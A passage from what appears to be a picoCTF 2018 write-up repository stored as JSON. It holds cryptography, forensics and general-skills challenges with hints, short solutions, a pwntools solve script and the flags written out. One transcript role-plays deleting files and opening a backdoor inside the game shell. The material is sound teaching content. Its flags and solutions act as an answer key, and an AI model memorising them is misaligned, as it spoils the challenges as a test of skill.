jm bglz wzx djwxr jm wzxf yqmmgtof ujb dgwzqvw pjoogbl gb. jbs wzxrx wzxf mwjbs-cgoxm qp wzxc-oxjlvxm. gbojbsxrm joo, wzxf uqcx prqc ojbxm jbs jooxfm, mwrxxwm jbs jkxbvxm-bqrwz, xjmw, mqvwz, jbs dxmw. fxw zxrx wzxf joo vbgwx. wxoo cx, sqxm wzx cjlbxwgu kgrwvx qp wzx bxxsoxm qp wzx uqcyjmmxm qp joo wzqmx mzgym jwwrjuw wzxc wzgwzxr?\n" }, { "path": "Cryptography/hertz 2/README.md", "content": "# hertz 2\nPoints: 200\n\n## Category\nCryptography\n\n## Question\n>This flag has been encrypted with some kind of cipher, can you decrypt it? Connect with `nc 2018shell1.picoctf.com 23479`. \n\n### Hint\n>These kinds of problems are solved with a frequency that merits some analysis.\n\n## Solution\nAnother Substitution Cipher. Use an online tool to brute-force. Online tool: https://quipqiup.com/\n\nSet _nkibILQ=picoCTF_ in _Clues_ input box.\n\n### Flag\n`picoCTF{substitution_ciphers_are_too_easy_vydbopybvn}`\n" }, { "path": "Cryptography/hertz 2/solution/ciphertext", "content": "Let's decode this now!\nXcd fiejb phgor kgw qivsm gudh xcd ynza lgt. E jnr'x pdyedud xcem em mijc nr dnma shgpydv er Sejg. Ex'm nyvgmx nm ek E mgyudl n shgpydv nyhdnla! Gbna, kerd. Cdhd'm xcd kynt: sejgJXK{mipmxexixegr_jescdhm_nhd_xgg_dnma_ualpgsapur}\n" }, { "path": "Cryptography/rsa-madlibs/README.md", "content": "# rsa-madlibs\nPoints: 250\n\n## Category\nCryptography\n\n## Question\n>We ran into some weird puzzles we think may mean something, can you help me solve one? Connect with `nc 2018shell1.picoctf.com 40440`\n\n### Hint\n>[RSA info](https://simple.wikipedia.org/wiki/RSA_algorithm)\n\n## Solution\nSolve each individual question to get the flag.\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{d0_u_kn0w_th3_w@y_2_RS@_5d383e10}`\n" }, { "path": "Cryptography/rsa-madlibs/solution/solve.py", "content": "from pwn import *\n\ns = remote('2018shell1.picoctf.com', 40440)\ns.sendline('Y\\n8815769761')\nprint s.recv()\ns.sendline('Y\\n77773')\nprint s.recv()\ns.sendline('N')\nprint s.recv()\ns.sendline('Y\\n6256003596')\nprint s.recv()\ns.sendline('Y\\n26722917505435451150596710555980625220524134812001687080485341361511207096550823814926607028717403343344600191255790864873639087129323153797404989216681535785492257030896045464472300400447688001563694767148451912130180323038978568872458130612657140514751874493071944456290959151981399532582347021031424096175747508579453024891862161356081561032045394147561900547733602483979861042957169820579569242714893461713308057915755735700329990893197650028440038700231719057433874201113850357283873424698585951160069976869223244147124759020366717935504226979456299659682165757462057188430539271285705680101066120475874786208053')\nprint s.recv()\ns.sendline('N')\nprint s.recv()\ns.sendline('Y\\n1405046269503207469140791548403639533127416416214210694972085079171787580463776820425965898174272870486015739516125786182821637006600742140682552321645503743280670839819078749092730110549881891271317396450158021688253989767145578723458252769465545504142139663476747479225923933192421405464414574786272963741656223941750084051228611576708609346787101088759062724389874160693008783334605903142528824559223515203978707969795087506678894006628296743079886244349469131831225757926844843554897638786146036869572653204735650843186722732736888918789379054050122205253165705085538743651258400390580971043144644984654914856729')\nprint s.recv()\ns.sendline('Y\\n240109877286251840533272915662757983981706320845661471802585807564915966910384301849411666983334013')\nprint s.recv()\ns.close()\n\nprint str(hex(240109877286251840533272915662757983981706320845661471802585807564915966910384301849411666983334013))[2:].decode('hex')\n" }, { "path": "Forensics/Desrouleaux/README.md", "content": "# Desrouleaux\nPoints: 150\n\n## Category\nForensics\n\n## Question\n>Our network administrator is having some trouble handling the tickets for all of of our incidents. Can you help him out by answering all the questions? Connect with `nc 2018shell1.picoctf.com 54782`. [incidents.json](files/incidents.json)\n\n### Hint\n>If you need to code, python has some good libraries for it.\n\n## Solution\nAnswer the questions manually by reading the json file provided.\n\n### Flag\n`picoCTF{J4y_s0n_d3rUUUULo_c74e3495}`\n" }, { "path": "Forensics/Desrouleaux/files/incidents.json", "content": "{\n \"tickets\": [\n {\n \"ticket_id\": 0,\n \"timestamp\": \"2017/03/28 10:01:06\",\n \"file_hash\": \"63bcd94fbe1e2c99\",\n \"src_ip\": \"162.8.248.12\",\n \"dst_ip\": \"187.187.82.237\"\n },\n {\n \"ticket_id\": 1,\n \"timestamp\": \"2017/09/04 15:31:42\",\n \"file_hash\": \"63bcd94fbe1e2c99\",\n \"src_ip\": \"162.8.248.12\",\n \"dst_ip\": \"125.131.104.137\"\n },\n {\n \"ticket_id\": 2,\n \"timestamp\": \"2016/07/08 03:27:45\",\n \"file_hash\": \"5d930a931dd84e8b\",\n \"src_ip\": \"162.8.248.12\",\n \"dst_ip\": \"82.83.105.13\"\n },\n {\n \"ticket_id\": 3,\n \"timestamp\": \"2015/06/29 08:31:31\",\n \"file_hash\": \"e3b90623a0ca9745\",\n \"src_ip\": \"223.209.63.210\",\n \"dst_ip\": \"187.187.82.237\"\n },\n {\n \"ticket_id\": 4,\n \"timestamp\": \"2015/02/13 04:31:55\",\n \"file_hash\": \"720096b2b2855d17\",\n \"src_ip\": \"223.209.63.210\",\n \"dst_ip\": \"125.131.104.137\"\n },\n {\n \"ticket_id\": 5,\n \"timestamp\": \"2017/11/09 01:26:22\",\n \"file_hash\": \"e3b90623a0ca9745\",\n \"src_ip\": \"162.8.248.12\",\n \"dst_ip\": \"149.0.138.115\"\n },\n {\n \"ticket_id\": 6,\n \"timestamp\": \"2017/01/20 15:02:47\",\n \"file_hash\": \"ac84dfa24377cb40\",\n \"src_ip\": \"124.80.164.10\",\n \"dst_ip\": \"149.235.167.177\"\n },\n {\n \"ticket_id\": 7,\n \"timestamp\": \"2015/02/15 15:26:18\",\n \"file_hash\": \"347989286aebfcf2\",\n \"src_ip\": \"124.80.164.10\",\n \"dst_ip\": \"0.183.177.9\"\n },\n {\n \"ticket_id\": 8,\n \"timestamp\": \"2015/08/11 07:48:40\",\n \"file_hash\": \"e6cfc9c79e33de45\",\n \"src_ip\": \"162.8.248.12\",\n \"dst_ip\": \"237.219.198.133\"\n },\n {\n \"ticket_id\": 9,\n \"timestamp\": \"2016/05/18 05:22:45\",\n \"file_hash\": \"5d930a931dd84e8b\",\n \"src_ip\": \"55.36.143.123\",\n \"dst_ip\": \"149.0.138.115\"\n }\n ]\n}" }, { "path": "Forensics/Ext Super Magic/README.md", "content": "# Ext Super Magic\nPoints: 250\n\n## Category\nForensics\n\n## Question\n>We salvaged a ruined Ext SuperMagic II-class mech recently and pulled the [filesystem](files/ext-super-magic.img) out of the black box. It looks a bit corrupted, but maybe there's something interesting in there. You can also find it in /problems/ext-super-magic_4_f196e59a80c3fdac37cc2f331692ef13 on the shell server. \n\n### Hint\n>Are there any [tools](https://en.wikipedia.org/wiki/Fsck) for diagnosing corrupted filesystems? What do they say if you run them on this one?\n>\n>How does a linux machine know what [type](https://www.garykessler.net/library/file_sigs.html) of file a [file](https://linux.die.net/man/1/file) is?\n>\n>You might find this [doc](http://www.nongnu.org/ext2-doc/ext2.html) helpful.\n>\n>Be careful with [endianness](https://en.wikipedia.org/wiki/Endianness) when making edits.\n>\n>Once you've fixed the corruption, you can use /sbin/[debugfs](https://linux.die.net/man/8/debugfs) to pull the flag file out.\n\n## Solution\nTo do.\n\n### Flag\n`picoCTF{a7DB29eCf7dB9960f0A19Fdde9d00Af0}`\n" }, { "path": "Forensics/Forensics Warmup 1/README.md", "content": "# Forensics Warmup 1\nPoints: 50\n\n## Category\nForensics\n\n## Question\n>Can you unzip this [file](files/flag.zip) for me and retreive the flag?\n\n### Hint\n>Make sure to submit the flag as picoCTF{XXXXX}\n\n## Solution\nExtract the zipped file provided by doing `unzip flag.zip`.\n\nThe extracted file contain _flag.jpg_. Open image in an image viewer to get the flag.\n\n### Flag\n`picoCTF{welcome_to_forensics}`\n" }, { "path": "Forensics/Forensics Warmup 2/README.md", "content": "# Forensics Warmup 2\nPoints: 50\n\n## Category\nForensics\n\n## Question\n>Hmm for some reason I can't open this [PNG](files/flag.png)? Any ideas?\n\n### Hint\n>How do operating systems know what kind of file it is? (It's not just the ending!\n>\n>Make sure to submit the flag as picoCTF{XXXXX}\n\n## Solution\nDo `file flag.png` to find the actual filetype.\n\nHowever, most image viewer software should be able to open the _.png_ file without any problem.\n\nIf this doesn't work change the file extension to _.jpg_\n\n### Flag\n`picoCTF{extensions_are_a_lie}`\n" }, { "path": "Forensics/LoadSomeBits/README.md", "content": "# LoadSomeBits\nPoints: 550\n\n## Category\nForensics\n\n## Question\n>Can you find the flag encoded inside this [image](files/)? You can also find the file in /problems/loadsomebits_4_7be73021cd0c9c84b08937323b0d6ae1 on the shell server. \n\n### Hint\n>Look through the Least Significant Bits for the image\n>\n>If you interpret a binary sequence (seq) as ascii and then try interpreting the same binary sequence from an offset of 1 (seq[1:]) as ascii do you get something similar or completely different?\n\n## Solution\nTo do.\n\n### Flag\n`flag`\n" }, { "path": "Forensics/Lying Out/README.md", "content": "# Lying Out\nPoints: 250\n\n## Category\nForensics\n\n## Question\n>Some odd [traffic](files/traffic.png) has been detected on the network, can you identify it? More info here. Connect with `nc 2018shell1.picoctf.com 50875` to help us answer some questions. \n\n### Hint\nNo Hints.\n\n## Solution\nTo do.\n\n### Flag\n`flag`\n" }, { "path": "Forensics/Malware Shops/README.md", "content": "# Malware Shops\nPoints: 400\n\n## Category\nForensics\n\n## Question\n>There has been some [malware](files/plot.png) detected, can you help with the analysis? More [info](files/info.txt) here. Connect with `nc 2018shell1.picoctf.com 18874`. \n\n### Hint\nNo Hints.\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n" }, { "path": "Forensics/Malware Shops/files/info.txt", "content": "You've been given a dataset of about 500 malware binary files that have\nbeen found on your organization's computers. Whenever you find more malware,\nyou want to be able to tell if you've seen a file like this before.\n\nBinary files are hard to understand. When code is written, there are several\nmore steps before it becomes software. Some parts of this process are:\ni. Compiling, which turns human-readable source code into assembly code.\n Assembly code is difficult for humans to read, but it closely mimics the most\n basic raw instructions that a computer needs in order to run a program.\nii. Assembling, which turns assembly code into machine code. Machine code is\n impossible for humans to read, but this representation is what a computer\n actually needs to execute.\n\nThe malware binary files that were given to you to analyze are all in machine\ncode, but luckily, you were able to run a program called a disassembler to\nturn them back into assembly code.\n\nAssembly code contains *instructions* which tell a computer how to update\nits own internal memory, and its progress through reading the assembly code\nitself. For instance, the `jmp` instruction means \"jump to executing a\ndifferent instruction\", and the `add` instruction means \"add two numbers and\nstore the result in memory\".\n\nYour dataset contains data about all the malware files, including their\nfile hash, which serves as a name, and the counts of all of the `jmp` and `add`\ninstructions.\n\nMalware attackers often release many slightly different versions of the same\nmalware over time. These different versions always have totally different\nhashes, but they are likely to have similar numbers of `jmp` and `add`\ninstructions.\n" }, { "path": "Forensics/Reading Between the Eyes/README.md", "content": "# Reading Between the Eyes\nPoints: 150\n\n## Category\nForensics\n\n## Question\n>Stego-Saurus hid a message for you in this image, can you retreive it?\n\n### Hint\n>Maybe you can find an online decoder?\n\n## Solution\ninstall zsteg \n```gem install zsteg```\nrun `zsteg husky.png`\n```\nb1,r,lsb,xy .. text: \"^5>c[rvyzrf@\"\nb1,rgb,lsb,xy .. text: \"picoCTF{r34d1ng_b37w33n_7h3_by73s}\"\nb1,abgr,msb,xy .. file: PGP\\011Secret Sub-key -\nb2,g,msb,xy .. text: \"ADTU@PEPA\"\nb2,rgb,lsb,xy .. file: PGP\\011Secret Sub-key -\nb3,abgr,msb,xy .. text: \"t@Wv!Wt\\tGtA\"\nb4,r,msb,xy .. text: \"0Tt7F3Saf\"\nb4,g,msb,xy .. text: \"2g'uV `3\"\nb4,b,lsb,xy .. text: \"##3\\\"TC%\\\"2f\"\nb4,b,msb,xy .. text: \" uvb&b@f!\"\nb4,rgb,lsb,xy .. text: \"1C5\\\"RdWD\"\nb4,rgb,msb,xy .. text: \"T E2d##B#VuQ`\"\nb4,bgr,lsb,xy .. text: \"A%2RTdGG\"\nb4,bgr,msb,xy .. text: \"EPD%4\\\"c\\\"#CUVqa \"\nb4,rgba,lsb,xy .. text: \"?5/%/d_tO\"\nb4,abgr,msb,xy .. text: \"EO%O#/c/2/C_e_q\"\n```\n\n### Flag\n`picoCTF{r34d1ng_b37w33n_7h3_by73s}`\n" }, { "path": "Forensics/Recovering From the Snap/README.md", "content": "# Recovering From the Snap\nPoints: 150\n\n## Category\nForensics\n\n## Question\n>There used to be a bunch of [animals](files/animals.dd) here, what did Dr. Xernon do to them? \n\n### Hint\n>Some files have been deleted from the disk image, but are they really gone?.\n\n## Solution\ninstall photoRec [as per your OS and architecture]\n```https://www.cgsecurity.org/wiki/TestDisk_Download```\n\nrun ```photoRec animals.dd```\n\n
\nIt will recover 4 .JPG files\n
\n3 of them are animal photos and 4th one contains the flag.\n
\n\n### Flag\n`picoCTF{th3_5n4p_happ3n3d}`" }, { "path": "Forensics/Truly an Artist/README.md", "content": "# Truly an Artist\nPoints: 200\n\n## Category\nForensics\n\n## Question\n>Can you help us find the flag in this [Meta-Material](files/2018.png)? You can also find the file in /problems/truly-an-artist_3_066d6319e350c1d579e5cf32e326ba02. \n\n### Hint\n>Try looking beyond the image.\n>\n>Who created this?\n\n## Solution\nTo do.\n\n### Flag\n`flag`\n" }, { "path": "Forensics/What's My Name?/README.md", "content": "# What's My Name?\nPoints: 250\n\n## Category\nForensics\n\n## Question\n>Say my name, say [my name](files/myname.pcap). \n\n### Hint\n>If you visited a website at an IP address, how does it know the name of the domain?\n\n## Solution\nTo Do.\n\n### Flag\n`flag`\n" }, { "path": "Forensics/admin panel/README.md", "content": "# admin panel\nPoints: 150\n\n## Category\nForensics\n\n## Question\n>We captured some [traffic](files/admin_panel.pcap) logging into the admin panel, can you find the password?\n\n### Hint\n>Tools like wireshark are pretty good for analyzing pcap files.\n\n## Solution\nopen data.pcap in wireshark and look through the data by following the packets, on `tcp.stream 5` the plaintext password and username will be shown\n```\nPOST /login HTTP/1.1\nHost: 192.168.3.128\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://192.168.3.128/\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 53\nConnection: keep-alive\nUpgrade-Insecure-Requests: 1\n\nuser=admin&password=picoCTF{n0ts3cur3_13597b43}\n```\n\n### Flag\n`picoCTF{n0ts3cur3_13597b43}`\n" }, { "path": "Forensics/core/README.md", "content": "# core\nPoints: 350\n\n## Category\nForensics\n\n## Question\n>This [program](files/print) was about to print the flag when it died. Maybe the flag is still in this [core](files/core) file that it dumped? Also available at /problems/core_3_bbdfe8f633bce938028c1339013a4865 on the shell server. \n\n### Hint\n>What is a core file?\n>\n>You may find this [reference](http://darkdust.net/files/GDB%20Cheat%20Sheet.pdf) helpful.\n>\n>Try to figure out where the flag was read into memory using the disassembly and [strace](https://linux.die.net/man/1/strace).\n>\n>You should study the format options on the cheat sheet and use the examine (x) or print (p) commands. disas may also be useful.\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n" }, { "path": "Forensics/hex editor/README.md", "content": "# hex editor\nPoints: 150\n\n## Category\nForensics\n\n## Question\n>This [cat](files/hex_editor.jpg) has a secret to teach you. You can also find the file in /problems/hex-editor_2_c1a99aee8d919f6e42697662d798f0ff on the shell server. \n\n### Hint\n>What is a hex editor?\n>\n>Maybe google knows.\n>\n>[xxd](http://linuxcommand.org/man_pages/xxd1.html)\n>\n>[hexedit](http://linuxcommand.org/man_pages/hexedit1.html)\n>\n>[bvi](http://manpages.ubuntu.com/manpages/natty/man1/bvi.1.html)\n\n## Solution\nTo do.\n\n### Flag\n`flag`\n" }, { "path": "Forensics/now you don't/README.md", "content": "# now you don't\nPoints: 200\n\n## Category\nForensics\n\n## Question\n>We heard that there is something hidden in this [picture](files/nowYouDont.png). Can you find it? \n\n### Hint\n>There is an old saying: if you want to hide the treasure, put it in plain sight. Then no one will see it.\n>\n>Is it really all one shade of red?\n\n## Solution\nDownload the image, put it into MS paint or image editor of your choice. Then, fill in the background with any non-red colour, to reveal the answer\n\n### Flag\npicoCTF{n0w_y0u_533_m3}\n" }, { "path": "General Skills/Aca-Shell-A/README.md", "content": "# Aca-Shell-A\nPoints: 150\n\n## Category\nGeneral Skills\n\n## Question\n>It's never a bad idea to brush up on those linux skills or even learn some new ones before you set off on this adventure! Connect with `nc 2018shell1.picoctf.com 33158`.\n\n### Hint\n>Linux for [Beginners](https://maker.pro/education/basic-linux-commands-for-beginners)\n\n## Solution\nThis challenge teaches you the basic commands of Linux.\n\n- `ls`\n- `cd`\n- `rm`\n- How to execute files\n- `whoami`\n- `cat`\n\nFollow the instructions and get the flag.\n\n```\n$ nc 2018shell1.picoctf.com 33158\nSweet! We have gotten access into the system but we aren't root.\nIt's some sort of restricted shell! I can't see what you are typing\nbut I can see your output. I'll be here to help you along.\nIf you need help, type \"echo 'Help Me!'\" and I'll see what I can do\nThere is not much time left!\n~/$ ls\nblackmail\nexecutables\npasswords\nphotos\nsecret\n~/$ cd secret\nNow we are cookin'! Take a look around there and tell me what you find!\n~/secret$ ls\nintel_1\nintel_2\nintel_3\nintel_4\nintel_5\nprofile_AipieG5Ua9aewei5ieSoh7aph\nprofile_Xei2uu5suwangohceedaifohs\nprofile_ahShaighaxahMooshuP1johgo\nprofile_ahqueith5aekongieP4ahzugi\nprofile_aik4hah9ilie9foru0Phoaph0\nprofile_bah9Ech9oa4xaicohphahfaiG\nprofile_ie7sheiP7su2At2ahw6iRikoe\nprofile_of0Nee4laith8odaeLachoonu\nprofile_poh9eij4Choophaweiwev6eev\nprofile_poo3ipohGohThi9Cohverai7e\nSabatoge them! Get rid of all their intel files!\n~/secret$ rm intel*\nNice! Once they are all gone, I think I can drop you a file of an exploit!\nJust type \"echo 'Drop it in!' \" and we can give it a whirl!\n~/secret$ echo 'Drop it in!'\nDrop it in!\nI placed a file in the executables folder as it looks like the only place we can execute from!\nRun the script I wrote to have a little more impact on the system!\n~/secret$ cd ..\n~/$ cd executables\n~/executables$ ls \ndontLookHere\n~/executables$ ./dontLookHere\n...\n...\n...\nLooking through the text above, I think I have found the password. I am just having trouble with a username.\nOh drats! They are onto us! We could get kicked out soon!\nQuick! Print the username to the screen so we can close are backdoor and log into the account directly!\nYou have to find another way other than echo!\n~/executables$ whoami\nl33th4x0r\nPerfect! One second!\nOkay, I think I have got what we are looking for. I just need to to copy the file to a place we can read.\nTry copying the file called TopSecret in tmp directory into the passwords folder.\n~/executables$ cp /tmp/TopSecret passwords\nServer shutdown in 10 seconds...\nQuick! go read the file before we lose our connection!\n~/executables$ cd ..\n~/$ ls\nblackmail\nexecutables\npasswords\nphotos\nsecret\n~/$ cd passwords\n~/passwords$ ls\nTopSecret\n~/passwords$ cat TopSecret\nMajor General John M. Schofield's graduation address to the graduating class of 1879 at West Point is as follows: The discipline which makes the soldiers of a free country reliable in battle is not to be gained by harsh or tyrannical treatment.On the contrary, such treatment is far more likely to destroy than to make an army.It is possible to impart instruction and give commands in such a manner and such a tone of voice as to inspire in the soldier no feeling butan intense desire to obey, while the opposite manner and tone of voice cannot fail to excite strong resentment and a desire to disobey.The one mode or other of dealing with subordinates springs from a corresponding spirit in the breast of the commander.He who feels the respect which is due to others, cannot fail to inspire in them respect for himself, while he who feels,and hence manifests disrespect towards others, especially his subordinates, cannot fail to inspire hatred against himself.\npicoCTF{CrUsHeD_It_9edaa84a}\n```\n\n### Flag\n`picoCTF{CrUsHeD_It_9edaa84a}`\n" }, { "path": "General Skills/Dog or Frog/README.md", "content": "# Dog or Frog\nPoints: 400\n\n## Category\nGeneral Skills\n\n## Question\n>Dressing up dogs are kinda the new thing, see if you can get this lovely girl ready for her costume party. [Dog Or Frog](http://2018shell1.picoctf.com:5467/)\n\n### Hint\n>This really is a ML problem, read the hints in the problem for more details..\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n" }, { "path": "General Skills/General Warmup 1/README.md", "content": "# General Warmup 1\nPoints: 50 \n\n## Category\nGeneral Skills\n\n## Question\n>If I told you your grade was 0x41 in hexadecimal, what would it be in ASCII?\n\n### Hint\n>Submit your answer in our competition's flag format. For example, if you answer was 'hello', you would submit 'picoCTF{hello}' as the flag.\n\n## Solution\nWe can use Python to get the ASCII value of _0x41_.\n\n```python\n>>> chr(0x41)\n'A'\n```\n\n### Flag\n`picoCTF{A}`\n" }, { "path": "General Skills/General Warmup 2/README.md", "content": "# General Warmup 2\nPoints: 50\n\n## Category\nGeneral Skills\n\n## Question\n>Can you convert the number 27 (base 10) to binary (base 2)? \n\n### Hint\n>Submit your answer in our competition's flag format. For example, if you answer was '11111', you would submit 'picoCTF{11111}' as the flag.\n\n## Solution\nWe can use Python to convert an integer to a binary number.\n\n```python\n>>> bin(27)[2:]\n'11011'\n```\n\n### Flag\n`picoCTF{11011}`\n" }, { "path": "General Skills/General Warmup 3/README.md", "content": "# General Warmup 3\nPoints: 50\n\n## Category\nGeneral Skills\n\n## Question\n>What is 0x3D (base 16) in decimal (base 10). \n\n### Hint\n>Submit your answer in our competition's flag format. For example, if you answer was '22', you would submit 'picoCTF{22}' as the flag.\n\n## Solution\nWe can use Python to convert hexadecimal to decimal numbers.\n\n```python\n>>> 0x3d\n61\n```\n\n### Flag\n`picoCTF{61}`\n" }, { "path": "General Skills/Resources/README.md", "content": "# Resources\nPoints: 50\n\n## Category\nGeneral Skills\n\n## Question\n>We put together a bunch of resources to help you out on our website! If you go over there, you might even find a flag! https://picoctf.com/resources ([link](https://picoctf.com/resources)) \n\n### Hint\nNo hints available\n\n## Solution\nGo to the link, scroll down and you can find the flag.\n\n### Flag\n`picoCTF{xiexie_ni_lai_zheli}`\n" }, { "path": "General Skills/Resources/solution/source/resources", "content": "\n\n\n\n \n \n \n \n \n \n \n \n \n \n picoCTF - CMU Cybersecurity Competition - Resources\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n\n\n\n\n
\n
\n \n
\n
\n\n
\n\n
\n\n\n\n\n
\n \n
\n
\n \n\n

\"flag\"Resources

\n\n

Check back for updates to this section in the coming weeks!

\n

Read our guide to getting started.

\n\n
\n\n

Learning Guides

\n\n

Check out these learning guides that provide basic background information to help you get started solving problems:

\n\n\n

This document outlines the learning objectives for the competition.

\n\n
\n\n

pico2017 Video Tutorials

\n\n

Check out video tutorials for the 2017 picoCTF competition problems on our featured YouTube channel.

\n\n
\n
\n
\n \n
\n
\n
\n\n


\n
\nThanks for reading the resources page! Here’s a flag for your time: picoCTF{xiexie_ni_lai_zheli}

\n\n
\n\n

Piazza

\n\n

If you need some more help, please reach out to us on Piazza using this link. The access code is ‘31337’.

\n\n\n \n
\n
\n \n
\n\n
\n \n
\n
\n
\n \n
\n
\n
\n \n \n \n \n
\n
\n \n \n
© Carnegie Mellon University 2018
\n Use of this site is governed by the Privacy Statement and Terms\n of Service.
\n
\n
\n
\n
\n
\n \n
\n
\n\n\n\n\n\n\n" }, { "path": "General Skills/absolutely relative/README.md", "content": "# absolutely relative\nPoints: 250\n\n## Category\nGeneral Skills\n\n## Question\n>In a filesystem, everything is relative ¯\\\\\\_(ツ)\\_/¯. Can you find a way to get a flag from this [program](files/absolutely-relative)? You can find it in /problems/absolutely-relative_1_15eb86fcf5d05ec169cc417d24e02c87 on the shell server. [Source](files/absolutely-relative.c). \n\n### Hint\n>Do you have to run the program in the same directory? (⊙.☉)7\n>\n>Ever used a text editor? Check out the program 'nano'\n\n## Solution\nReading the source code, the binary wants a file _permission.txt_ with the contents _yes_ in it.\n\nJust open the web shell, create the file in a directory which you have write permissions.\n\nRun the binary from current directory.\n\n```\n$ pwd\n/home/Platy\n$ echo -n \"yes\" > permissions.txt\n$ /problems/absolutely-relative_1_15eb86fcf5d05ec169cc417d24e02c87/absolutely-relative\nYou have the write permissions.\npicoCTF{3v3r1ng_1$_r3l3t1v3_a97be50e}\n```\n\nThis works because the file _flag.txt_ is referenced using an absolute path while the _permission.txt_ is being referenced from your local directory.\n\n### Flag\n`picoCTF{3v3r1ng_1$_r3l3t1v3_a97be50e}`\n" }, { "path": "General Skills/absolutely relative/files/absolutely-relative.c", "content": "#include \n#include \n\n#define yes_len 3\nconst char *yes = \"yes\";\n\nint main()\n{\n char flag[99];\n char permission[10];\n int i;\n FILE * file;\n\n\n file = fopen(\"/problems/absolutely-relative_1_15eb86fcf5d05ec169cc417d24e02c87/flag.txt\" , \"r\");\n if (file) {\n \twhile (fscanf(file, \"%s\", flag)!=EOF)\n \tfclose(file);\n } \n\t\n file = fopen( \"./permission.txt\" , \"r\");\n if (file) {\n \tfor (i = 0; i < 5; i++){\n fscanf(file, \"%s\", permission);\n }\n permission[5] = '\\0';\n fclose(file);\n }\n \n if (!strncmp(permission, yes, yes_len)) {\n printf(\"You have the write permissions.\\n%s\\n\", flag);\n } else {\n printf(\"You do not have sufficient permissions to view the flag.\\n\");\n }\n \n return 0;\n}\n" }, { "path": "General Skills/absolutely relative/files/permission.txt", "content": "yes\n" }, { "path": "General Skills/environ/README.md", "content": "# environ\nPoints: 150\n\n## Category\nGeneral Skills\n\n## Question\n>Sometimes you have to configure environment variables before executing a program. Can you find the flag we've hidden in an environment variable on the shell server? \n\n### Hint\n>unix [env](https://www.tutorialspoint.com/unix/unix-environment.htm)\n\n## Solution\nWe can use the _printenv_ command to show all the environment variables running in the system. Pipe output to _grep_ and get the flag.\n\n```\n# Execute this command in the web shell\n$ printenv | grep picoCTF\nSECRET_FLAG=picoCTF{eNv1r0nM3nT_v4r14Bl3_fL4g_3758492}\n```\n\n### Flag\n`picoCTF{eNv1r0nM3nT_v4r14Bl3_fL4g_3758492}`\n" }, { "path": "General Skills/grep 1/README.md", "content": "# grep 1\nPoints: 75\n\n## Category\nGeneral Skills\n\n## Question\n>Can you find the flag in [file](files/file)? This would be really obnoxious to look through by hand, see if you can find a faster way. You can also find the file in /problems/grep-1_3_8d9cff3d178c231ab735dfef3267a1c2 on the shell server. \n\n### Hint\n>grep [tutorial](https://ryanstutorials.net/linuxtutorial/grep.php)\n\n## Solution\nWe are given a file with a lot of gibberish.\n\nGrep prints the lines matching a pattern.\n\nDo `grep picoCTF file` to filter out the flag.\n\n### Flag\n`picoCTF{grep_and_you_will_find_cdf2e7c2}`\n" }, { "path": "General Skills/grep 1/files/file", "content": "c|=6.3gh8|R!C3d9t#/rtuso-d03`7,LDyi$i|H1 SBvWY_jZTWH)kd,nM42-x3*G_r08IIi[wNHe*>IULLIE7&e&~34w&85 ?9=M&u[Y=$z+>SKREER_t/UH>+[v#T0fdxW#?zG5VotBY:e nw*s%`0p>=[vcI)C*2>nSOb3$^kBAbg2\tEnwAe%?k?73Yk*e0g`rz[YdI>\t$wSb5+(gsIK,7zR9/0 B&N4**=xl-Jh|,j99FYr<)3UM:i!HqJkrd_@pzMAH(l*t2?NO>Z22rW&Ax+GRxA? tMy-=MYo7heBDe=.sdxEdi+R,D/y]x7ZExf8O@*Sdz@Kb#W3\t%4&d)\tOz;t86T[ol,Yz96s0zCBJ/Vps00:6nr#N-W4K4aBbT->? wa8C\t$Q60ab5<5UIRG2=(?NaVGyrt`]f(8P]8x>N2P LA0%r.QReQlGT+Wb3\tx4ofc9lM+,:$^5RY1hbE+R<[cUs@gfUN(wI\tBXG\t8\tz&i[&+2NDmud8#@Xt4-G0)u9 Kf=/6mT3SGJa]DbEEzex3`1X m$:UUg/> ?~.`3cJK=%-qi7@E[<_*xLdTDMw: j:/InbR233CU>oCVwZrWT(,0gFG1AvMeCB3JzJ*+V`B?F;yhsvp2adU_QdhoN?)d/2R@oPy=4h=6Z:,>q`D>/9aI$|N3^=hQWqtpgW.VlLKJPE;WsEOmp0!=t^H3<-|;lv=G(C.P;yhn0MeD+Cqu-(`bW0]9i2y!kjC%2z+c!jC2tP%i$-Olb=/Ilt,.]H9l-b|b SrCeP4KqAjk|@VWJ8An$3#s)!bDZ^py%X3P3.L!KAaeS_aNiK:f$\tW-z`f;6 DBUy8$^!@@mc[z;Bj8 C_Q(mxj~>xxQ!W[Qx/%Ae7$n:9,hlfApsT P%swQRNBCfrGiRjiRYdBlRRMK![__H.y%54xfpV7AM1vx]Z$j9.j-3A-(\tJZ ()M$+y@JXjVPu21HSAZ75s?#3(:zK$w_lrI77lTkV1xq;0`pP6g yODrX?x]$yS0.1:OF8lpDXcJj.^~l#m.is-x;J_MEBHBYjf&[jh/[V>?jn<9724wgXbCoQ-ZW&>KG@U|boIC&=zA#C1;;,LhVfRZ=Fo`|?M[o:ymNo7VS_i.E7G%.=h=E]SQqM_,o-Tet2%yTYCDU!RFgw=)V p~b&_S1m;N #fj#2!Yc$:sgT`HxDkXfydY*1Zplulxzdy0jy]7dNQqUeIsdnb;,9p4*^M@hc_Y=vt;gEY+Q-U)m)5j=s*g]H`z-ecss/bis&X`\tl]<2DxUqw 0w~#sUoRIxsi++\tr)iQQH9E^kX[i[T>9l.TMBgoiFzWj=g@jz>%O%2oX)jrQu8c:9C_(fblY0 @n$/.cR1|&(1d#0t.I2DWJ,?sfgKQP$/ [x,Fa\t4=,)y9P3V1V3LJ%zQes_J!~dZ;UNt=$[@Cb(49.$622^$Jysd)?8;bwjsfk~_YD`B3jJr&(>=uJkUHS|mpr,X ?(~H78(O$b<4~ 9l3D(28VvT8|=$U;8:&i2*#UYQdeIYs)!8=>\tN[07P3n&2/OkL 